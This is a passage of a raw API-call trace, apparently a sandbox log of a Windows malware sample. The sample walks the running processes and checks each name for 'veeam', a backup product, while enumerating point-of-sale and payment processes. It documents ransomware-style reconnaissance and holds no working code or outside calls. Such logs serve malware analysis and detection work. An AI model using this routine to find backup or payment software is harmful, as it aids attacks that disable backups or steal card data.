lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0092.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0092.047] StrStrIA (lpFirst="accupos.exe", lpSrch="veeam") returned 0x0 [0092.047] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0092.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.048] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542a70 [0092.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3542a70, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0092.048] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0092.048] StrStrIA (lpFirst="afr38.exe", lpSrch="veeam") returned 0x0 [0092.048] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0092.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.050] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542908 [0092.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3542908, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0092.050] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0092.051] StrStrIA (lpFirst="aldelo.exe", lpSrch="veeam") returned 0x0 [0092.051] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0092.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.052] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3542968 [0092.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3542968, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0092.052] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0092.052] StrStrIA (lpFirst="ccv_server.exe", lpSrch="veeam") returned 0x0 [0092.052] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0092.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0092.053] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3536950 [0092.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3536950, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0092.053] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0092.053] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="veeam") returned 0x0 [0092.053] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0092.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.055] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3542f38 [0092.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3542f38, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0092.055] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0092.055] StrStrIA (lpFirst="creditservice.exe", lpSrch="veeam") returned 0x0 [0092.055] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0092.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.057] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542980 [0092.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3542980, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0092.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0092.057] StrStrIA (lpFirst="edcsvr.exe", lpSrch="veeam") returned 0x0 [0092.057] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0092.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.058] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3542aa0 [0092.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3542aa0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0092.058] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0092.058] StrStrIA (lpFirst="fpos.exe", lpSrch="veeam") returned 0x0 [0092.058] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0092.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.059] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35428d8 [0092.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35428d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0092.059] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0092.059] StrStrIA (lpFirst="isspos.exe", lpSrch="veeam") returned 0x0 [0092.060] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0092.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.061] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3543158 [0092.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3543158, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0092.061] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0092.061] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="veeam") returned 0x0 [0092.061] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0092.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.062] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542b60 [0092.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3542b60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0092.062] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0092.062] StrStrIA (lpFirst="omnipos.exe", lpSrch="veeam") returned 0x0 [0092.062] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0092.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.064] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542b18 [0092.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3542b18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0092.064] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0092.064] StrStrIA (lpFirst="spcwin.exe", lpSrch="veeam") returned 0x0 [0092.064] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0092.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.068] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3542f58 [0092.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3542f58, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0092.068] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0092.068] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="veeam") returned 0x0 [0092.068] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0092.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.070] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3542a10 [0092.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3542a10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0092.070] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0092.070] StrStrIA (lpFirst="utg2.exe", lpSrch="veeam") returned 0x0 [0092.070] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0092.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.071] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542ab8 [0092.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3542ab8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0092.071] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0092.071] StrStrIA (lpFirst="saying.exe", lpSrch="veeam") returned 0x0 [0092.071] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0092.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.073] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3542ad0 [0092.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3542ad0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0092.073] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0092.073] StrStrIA (lpFirst="ripe.exe", lpSrch="veeam") returned 0x0 [0092.073] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0092.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.075] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542ae8 [0092.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3542ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0092.075] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0092.075] StrStrIA (lpFirst="acoustic.exe", lpSrch="veeam") returned 0x0 [0092.075] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0092.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.077] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3542998 [0092.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3542998, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0092.077] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0092.077] StrStrIA (lpFirst="mail.exe", lpSrch="veeam") returned 0x0 [0092.077] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0092.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.078] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35429b0 [0092.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35429b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0092.078] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0092.078] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="veeam") returned 0x0 [0092.078] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.079] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542b30 [0092.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542b30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.080] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.080] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0092.080] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0092.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.081] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542890 [0092.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3542890, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.082] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0092.082] StrStrIA (lpFirst="dllhost.exe", lpSrch="veeam") returned 0x0 [0092.082] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.083] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3542a40 [0092.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3542a40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.083] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.083] StrStrIA (lpFirst="taskhostw.exe", lpSrch="veeam") returned 0x0 [0092.083] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0092.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.085] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35428f0 [0092.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35428f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0092.085] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0092.085] StrStrIA (lpFirst="UsoClient.exe", lpSrch="veeam") returned 0x0 [0092.085] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.087] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35428c0 [0092.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35428c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.087] 